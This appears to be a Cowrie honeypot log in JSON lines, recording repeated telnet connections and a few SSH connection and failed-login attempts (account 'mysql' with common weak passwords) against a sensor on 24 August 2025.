{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34856,"dst_ip":"1.2.3.4","dst_port":23,"session":"2aba4500a4d7","protocol":"telnet","message":"New connection: 60.22.179.111:34856 (1.2.3.4:23) [session: 2aba4500a4d7]","sensor":"my-vps","timestamp":"2025-08-24T23:39:50.619630Z"}
{"eventid":"cowrie.session.closed","duration":13.53917646408081,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:53.371804Z","src_ip":"60.22.179.111","session":"6f110b2acd93"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34881,"dst_ip":"1.2.3.4","dst_port":23,"session":"96baaf724aae","protocol":"telnet","message":"New connection: 60.22.179.111:34881 (1.2.3.4:23) [session: 96baaf724aae]","sensor":"my-vps","timestamp":"2025-08-24T23:39:53.581198Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52566,"dst_ip":"1.2.3.4","dst_port":22,"session":"73593521eba7","protocol":"ssh","message":"New connection: 196.251.115.108:52566 (1.2.3.4:22) [session: 73593521eba7]","sensor":"my-vps","timestamp":"2025-08-24T23:39:55.027103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:39:55.487982Z","src_ip":"196.251.115.108","session":"73593521eba7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:39:55.488772Z","src_ip":"196.251.115.108","session":"73593521eba7"}
{"eventid":"cowrie.session.closed","duration":13.163711309432983,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:55.574066Z","src_ip":"60.22.179.111","session":"93b5362122c9"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":34933,"dst_ip":"1.2.3.4","dst_port":23,"session":"01f1403270b7","protocol":"telnet","message":"New connection: 60.22.179.111:34933 (1.2.3.4:23) [session: 01f1403270b7]","sensor":"my-vps","timestamp":"2025-08-24T23:39:55.749171Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345678","message":"login attempt [mysql/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:39:58.767960Z","src_ip":"196.251.115.108","session":"73593521eba7"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:39:59.874237Z","src_ip":"196.251.115.108","session":"73593521eba7"}
{"eventid":"cowrie.session.closed","duration":13.802670955657959,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:00.465096Z","src_ip":"60.22.179.111","session":"6cd6617d4dc8"}
{"eventid":"cowrie.session.closed","duration":13.849010467529297,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:00.471958Z","src_ip":"60.22.179.111","session":"b2d961a63b43"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35041,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf019d3cb4a8","protocol":"telnet","message":"New connection: 60.22.179.111:35041 (1.2.3.4:23) [session: bf019d3cb4a8]","sensor":"my-vps","timestamp":"2025-08-24T23:40:00.643866Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35042,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a77a254f316","protocol":"telnet","message":"New connection: 60.22.179.111:35042 (1.2.3.4:23) [session: 6a77a254f316]","sensor":"my-vps","timestamp":"2025-08-24T23:40:00.701855Z"}
{"eventid":"cowrie.session.closed","duration":13.748381853103638,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:03.278976Z","src_ip":"60.22.179.111","session":"c92c20d1b141"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35062,"dst_ip":"1.2.3.4","dst_port":23,"session":"c51cabaebc81","protocol":"telnet","message":"New connection: 60.22.179.111:35062 (1.2.3.4:23) [session: c51cabaebc81]","sensor":"my-vps","timestamp":"2025-08-24T23:40:03.541444Z"}
{"eventid":"cowrie.session.closed","duration":13.789305686950684,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:04.408866Z","src_ip":"60.22.179.111","session":"2aba4500a4d7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35071,"dst_ip":"1.2.3.4","dst_port":23,"session":"395e4f261be6","protocol":"telnet","message":"New connection: 60.22.179.111:35071 (1.2.3.4:23) [session: 395e4f261be6]","sensor":"my-vps","timestamp":"2025-08-24T23:40:04.610440Z"}
{"eventid":"cowrie.session.closed","duration":14.04069972038269,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:07.621830Z","src_ip":"60.22.179.111","session":"96baaf724aae"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35198,"dst_ip":"1.2.3.4","dst_port":23,"session":"9de01e30f99d","protocol":"telnet","message":"New connection: 60.22.179.111:35198 (1.2.3.4:23) [session: 9de01e30f99d]","sensor":"my-vps","timestamp":"2025-08-24T23:40:07.728673Z"}
{"eventid":"cowrie.session.closed","duration":13.50330638885498,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:09.252408Z","src_ip":"60.22.179.111","session":"01f1403270b7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35225,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f071c10dcfd","protocol":"telnet","message":"New connection: 60.22.179.111:35225 (1.2.3.4:23) [session: 9f071c10dcfd]","sensor":"my-vps","timestamp":"2025-08-24T23:40:09.406942Z"}
{"eventid":"cowrie.session.closed","duration":13.635851621627808,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:14.279643Z","src_ip":"60.22.179.111","session":"bf019d3cb4a8"}
{"eventid":"cowrie.session.closed","duration":13.589350461959839,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:14.291116Z","src_ip":"60.22.179.111","session":"6a77a254f316"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35261,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa9f49d16a33","protocol":"telnet","message":"New connection: 60.22.179.111:35261 (1.2.3.4:23) [session: aa9f49d16a33]","sensor":"my-vps","timestamp":"2025-08-24T23:40:14.429133Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35262,"dst_ip":"1.2.3.4","dst_port":23,"session":"52dc8f8877d4","protocol":"telnet","message":"New connection: 60.22.179.111:35262 (1.2.3.4:23) [session: 52dc8f8877d4]","sensor":"my-vps","timestamp":"2025-08-24T23:40:14.593813Z"}
{"eventid":"cowrie.session.closed","duration":13.774508714675903,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:17.315865Z","src_ip":"60.22.179.111","session":"c51cabaebc81"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35326,"dst_ip":"1.2.3.4","dst_port":23,"session":"39335034ac08","protocol":"telnet","message":"New connection: 60.22.179.111:35326 (1.2.3.4:23) [session: 39335034ac08]","sensor":"my-vps","timestamp":"2025-08-24T23:40:17.522563Z"}
{"eventid":"cowrie.session.closed","duration":13.624125242233276,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:18.234493Z","src_ip":"60.22.179.111","session":"395e4f261be6"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35390,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b0d5e5fee5c","protocol":"telnet","message":"New connection: 60.22.179.111:35390 (1.2.3.4:23) [session: 4b0d5e5fee5c]","sensor":"my-vps","timestamp":"2025-08-24T23:40:18.423214Z"}
{"eventid":"cowrie.session.closed","duration":13.530695915222168,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:21.259303Z","src_ip":"60.22.179.111","session":"9de01e30f99d"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35424,"dst_ip":"1.2.3.4","dst_port":23,"session":"346cfd24f75f","protocol":"telnet","message":"New connection: 60.22.179.111:35424 (1.2.3.4:23) [session: 346cfd24f75f]","sensor":"my-vps","timestamp":"2025-08-24T23:40:21.449292Z"}
{"eventid":"cowrie.session.closed","duration":13.026690483093262,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:22.433524Z","src_ip":"60.22.179.111","session":"9f071c10dcfd"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35439,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d5a089c759f","protocol":"telnet","message":"New connection: 60.22.179.111:35439 (1.2.3.4:23) [session: 3d5a089c759f]","sensor":"my-vps","timestamp":"2025-08-24T23:40:22.652683Z"}
{"eventid":"cowrie.session.closed","duration":13.07606315612793,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:27.505123Z","src_ip":"60.22.179.111","session":"aa9f49d16a33"}
{"eventid":"cowrie.session.closed","duration":12.96866226196289,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:27.562405Z","src_ip":"60.22.179.111","session":"52dc8f8877d4"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35495,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3bd4db75b04","protocol":"telnet","message":"New connection: 60.22.179.111:35495 (1.2.3.4:23) [session: a3bd4db75b04]","sensor":"my-vps","timestamp":"2025-08-24T23:40:27.699868Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35496,"dst_ip":"1.2.3.4","dst_port":23,"session":"63b7abfa7151","protocol":"telnet","message":"New connection: 60.22.179.111:35496 (1.2.3.4:23) [session: 63b7abfa7151]","sensor":"my-vps","timestamp":"2025-08-24T23:40:27.720071Z"}
{"eventid":"cowrie.session.closed","duration":12.910700798034668,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:30.432120Z","src_ip":"60.22.179.111","session":"39335034ac08"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35619,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd01b49fea9c","protocol":"telnet","message":"New connection: 60.22.179.111:35619 (1.2.3.4:23) [session: bd01b49fea9c]","sensor":"my-vps","timestamp":"2025-08-24T23:40:30.735468Z"}
{"eventid":"cowrie.session.closed","duration":12.888078689575195,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:31.311224Z","src_ip":"60.22.179.111","session":"4b0d5e5fee5c"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35622,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce49aae09385","protocol":"telnet","message":"New connection: 60.22.179.111:35622 (1.2.3.4:23) [session: ce49aae09385]","sensor":"my-vps","timestamp":"2025-08-24T23:40:31.473880Z"}
{"eventid":"cowrie.session.closed","duration":12.991995334625244,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:34.441221Z","src_ip":"60.22.179.111","session":"346cfd24f75f"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35646,"dst_ip":"1.2.3.4","dst_port":23,"session":"55033d1e09bc","protocol":"telnet","message":"New connection: 60.22.179.111:35646 (1.2.3.4:23) [session: 55033d1e09bc]","sensor":"my-vps","timestamp":"2025-08-24T23:40:34.746063Z"}
{"eventid":"cowrie.session.closed","duration":13.88234281539917,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:36.534962Z","src_ip":"60.22.179.111","session":"3d5a089c759f"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35664,"dst_ip":"1.2.3.4","dst_port":23,"session":"a16a091e3538","protocol":"telnet","message":"New connection: 60.22.179.111:35664 (1.2.3.4:23) [session: a16a091e3538]","sensor":"my-vps","timestamp":"2025-08-24T23:40:36.731035Z"}
{"eventid":"cowrie.session.closed","duration":13.721657752990723,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:41.441664Z","src_ip":"60.22.179.111","session":"63b7abfa7151"}
{"eventid":"cowrie.session.closed","duration":13.742992877960205,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:41.442791Z","src_ip":"60.22.179.111","session":"a3bd4db75b04"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35814,"dst_ip":"1.2.3.4","dst_port":23,"session":"79f2f8092fe9","protocol":"telnet","message":"New connection: 60.22.179.111:35814 (1.2.3.4:23) [session: 79f2f8092fe9]","sensor":"my-vps","timestamp":"2025-08-24T23:40:41.650201Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35813,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc5118b133ae","protocol":"telnet","message":"New connection: 60.22.179.111:35813 (1.2.3.4:23) [session: dc5118b133ae]","sensor":"my-vps","timestamp":"2025-08-24T23:40:41.714330Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":58732,"dst_ip":"1.2.3.4","dst_port":22,"session":"a74a583ba4b9","protocol":"ssh","message":"New connection: 196.251.115.108:58732 (1.2.3.4:22) [session: a74a583ba4b9]","sensor":"my-vps","timestamp":"2025-08-24T23:40:43.151997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:40:43.467536Z","src_ip":"196.251.115.108","session":"a74a583ba4b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:40:43.468231Z","src_ip":"196.251.115.108","session":"a74a583ba4b9"}
{"eventid":"cowrie.session.closed","duration":13.637365579605103,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:44.372761Z","src_ip":"60.22.179.111","session":"bd01b49fea9c"}
{"eventid":"cowrie.session.closed","duration":12.9416983127594,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:44.415481Z","src_ip":"60.22.179.111","session":"ce49aae09385"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35833,"dst_ip":"1.2.3.4","dst_port":23,"session":"d16bd27bfafd","protocol":"telnet","message":"New connection: 60.22.179.111:35833 (1.2.3.4:23) [session: d16bd27bfafd]","sensor":"my-vps","timestamp":"2025-08-24T23:40:44.506739Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35834,"dst_ip":"1.2.3.4","dst_port":23,"session":"880e26348f78","protocol":"telnet","message":"New connection: 60.22.179.111:35834 (1.2.3.4:23) [session: 880e26348f78]","sensor":"my-vps","timestamp":"2025-08-24T23:40:44.580208Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"qwerty","message":"login attempt [mysql/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:40:46.789522Z","src_ip":"196.251.115.108","session":"a74a583ba4b9"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:47.902797Z","src_ip":"196.251.115.108","session":"a74a583ba4b9"}
{"eventid":"cowrie.session.closed","duration":13.585593938827515,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:48.331588Z","src_ip":"60.22.179.111","session":"55033d1e09bc"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35860,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7b01f1c7818","protocol":"telnet","message":"New connection: 60.22.179.111:35860 (1.2.3.4:23) [session: c7b01f1c7818]","sensor":"my-vps","timestamp":"2025-08-24T23:40:48.545900Z"}
{"eventid":"cowrie.session.closed","duration":13.845077991485596,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:50.576043Z","src_ip":"60.22.179.111","session":"a16a091e3538"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":35994,"dst_ip":"1.2.3.4","dst_port":23,"session":"3db282ac5a91","protocol":"telnet","message":"New connection: 60.22.179.111:35994 (1.2.3.4:23) [session: 3db282ac5a91]","sensor":"my-vps","timestamp":"2025-08-24T23:40:50.794448Z"}
{"eventid":"cowrie.session.closed","duration":13.918963432312012,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:55.569089Z","src_ip":"60.22.179.111","session":"79f2f8092fe9"}
{"eventid":"cowrie.session.closed","duration":13.888413190841675,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:55.602690Z","src_ip":"60.22.179.111","session":"dc5118b133ae"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36033,"dst_ip":"1.2.3.4","dst_port":23,"session":"908273632630","protocol":"telnet","message":"New connection: 60.22.179.111:36033 (1.2.3.4:23) [session: 908273632630]","sensor":"my-vps","timestamp":"2025-08-24T23:40:55.716361Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36034,"dst_ip":"1.2.3.4","dst_port":23,"session":"85bbe06cf42e","protocol":"telnet","message":"New connection: 60.22.179.111:36034 (1.2.3.4:23) [session: 85bbe06cf42e]","sensor":"my-vps","timestamp":"2025-08-24T23:40:55.740348Z"}
{"eventid":"cowrie.session.closed","duration":13.392189264297485,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:57.898828Z","src_ip":"60.22.179.111","session":"d16bd27bfafd"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36050,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd673041a176","protocol":"telnet","message":"New connection: 60.22.179.111:36050 (1.2.3.4:23) [session: cd673041a176]","sensor":"my-vps","timestamp":"2025-08-24T23:40:58.076429Z"}
{"eventid":"cowrie.session.closed","duration":14.023644924163818,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:40:58.603781Z","src_ip":"60.22.179.111","session":"880e26348f78"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36053,"dst_ip":"1.2.3.4","dst_port":23,"session":"af6567cf86dc","protocol":"telnet","message":"New connection: 60.22.179.111:36053 (1.2.3.4:23) [session: af6567cf86dc]","sensor":"my-vps","timestamp":"2025-08-24T23:40:58.817024Z"}
{"eventid":"cowrie.session.closed","duration":13.360172748565674,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:01.906000Z","src_ip":"60.22.179.111","session":"c7b01f1c7818"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36189,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c09ac59fd0a","protocol":"telnet","message":"New connection: 60.22.179.111:36189 (1.2.3.4:23) [session: 4c09ac59fd0a]","sensor":"my-vps","timestamp":"2025-08-24T23:41:02.032191Z"}
{"eventid":"cowrie.session.closed","duration":13.750499486923218,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:04.544868Z","src_ip":"60.22.179.111","session":"3db282ac5a91"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36205,"dst_ip":"1.2.3.4","dst_port":23,"session":"59513dbf5345","protocol":"telnet","message":"New connection: 60.22.179.111:36205 (1.2.3.4:23) [session: 59513dbf5345]","sensor":"my-vps","timestamp":"2025-08-24T23:41:04.736810Z"}
{"eventid":"cowrie.session.closed","duration":13.669257640838623,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:09.385543Z","src_ip":"60.22.179.111","session":"908273632630"}
{"eventid":"cowrie.session.closed","duration":13.64648962020874,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:09.386765Z","src_ip":"60.22.179.111","session":"85bbe06cf42e"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36240,"dst_ip":"1.2.3.4","dst_port":23,"session":"73127dec031c","protocol":"telnet","message":"New connection: 60.22.179.111:36240 (1.2.3.4:23) [session: 73127dec031c]","sensor":"my-vps","timestamp":"2025-08-24T23:41:09.578200Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36241,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f28862454de","protocol":"telnet","message":"New connection: 60.22.179.111:36241 (1.2.3.4:23) [session: 7f28862454de]","sensor":"my-vps","timestamp":"2025-08-24T23:41:09.625882Z"}
{"eventid":"cowrie.session.closed","duration":13.188554525375366,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:11.264889Z","src_ip":"60.22.179.111","session":"cd673041a176"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36309,"dst_ip":"1.2.3.4","dst_port":23,"session":"ecca629e9d91","protocol":"telnet","message":"New connection: 60.22.179.111:36309 (1.2.3.4:23) [session: ecca629e9d91]","sensor":"my-vps","timestamp":"2025-08-24T23:41:11.532499Z"}
{"eventid":"cowrie.session.closed","duration":13.526134490966797,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:12.343078Z","src_ip":"60.22.179.111","session":"af6567cf86dc"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36380,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfed60b23e72","protocol":"telnet","message":"New connection: 60.22.179.111:36380 (1.2.3.4:23) [session: cfed60b23e72]","sensor":"my-vps","timestamp":"2025-08-24T23:41:12.569062Z"}
{"eventid":"cowrie.session.closed","duration":13.76742935180664,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:15.799524Z","src_ip":"60.22.179.111","session":"4c09ac59fd0a"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36402,"dst_ip":"1.2.3.4","dst_port":23,"session":"994f568d2a28","protocol":"telnet","message":"New connection: 60.22.179.111:36402 (1.2.3.4:23) [session: 994f568d2a28]","sensor":"my-vps","timestamp":"2025-08-24T23:41:15.958579Z"}
{"eventid":"cowrie.session.closed","duration":13.59593939781189,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:18.332641Z","src_ip":"60.22.179.111","session":"59513dbf5345"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36419,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4a56e773961","protocol":"telnet","message":"New connection: 60.22.179.111:36419 (1.2.3.4:23) [session: a4a56e773961]","sensor":"my-vps","timestamp":"2025-08-24T23:41:18.479012Z"}
{"eventid":"cowrie.session.closed","duration":13.83682107925415,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:23.414917Z","src_ip":"60.22.179.111","session":"73127dec031c"}
{"eventid":"cowrie.session.closed","duration":13.798203468322754,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:23.424011Z","src_ip":"60.22.179.111","session":"7f28862454de"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36572,"dst_ip":"1.2.3.4","dst_port":23,"session":"9b444f550ff3","protocol":"telnet","message":"New connection: 60.22.179.111:36572 (1.2.3.4:23) [session: 9b444f550ff3]","sensor":"my-vps","timestamp":"2025-08-24T23:41:23.545607Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36573,"dst_ip":"1.2.3.4","dst_port":23,"session":"07570c99e513","protocol":"telnet","message":"New connection: 60.22.179.111:36573 (1.2.3.4:23) [session: 07570c99e513]","sensor":"my-vps","timestamp":"2025-08-24T23:41:23.696171Z"}
{"eventid":"cowrie.session.closed","duration":12.859336614608765,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:24.391769Z","src_ip":"60.22.179.111","session":"ecca629e9d91"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36576,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff0708c5e90f","protocol":"telnet","message":"New connection: 60.22.179.111:36576 (1.2.3.4:23) [session: ff0708c5e90f]","sensor":"my-vps","timestamp":"2025-08-24T23:41:24.545867Z"}
{"eventid":"cowrie.session.closed","duration":13.716201305389404,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:26.285182Z","src_ip":"60.22.179.111","session":"cfed60b23e72"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36589,"dst_ip":"1.2.3.4","dst_port":23,"session":"e05707ffc901","protocol":"telnet","message":"New connection: 60.22.179.111:36589 (1.2.3.4:23) [session: e05707ffc901]","sensor":"my-vps","timestamp":"2025-08-24T23:41:26.467103Z"}
{"eventid":"cowrie.session.closed","duration":13.534758806228638,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:41:29.493271Z","src_ip":"60.22.179.111","session":"994f568d2a28"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":36613,"dst_ip":"1.2.3.4","dst_port":23,"session":"26c73a88dce9","protocol":"telnet","message":"New connection: 60.22.179.111:36613 (1.2.3.4:23) [session: 26c73a88dce9]","sensor":"my-vps","timestamp":"2025-08-24T23:41:29.805541Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":35856,"dst_ip":"1.2.3.4","dst_port":22,"session":"d32e70fe955d","protocol":"ssh","message":"New connection: 196.251.115.108:35856 (1.2.3.4:22) [session: d32e70fe955d]","sensor":"my-vps","timestamp":"2025-08-24T23:41:30.712653Z"}
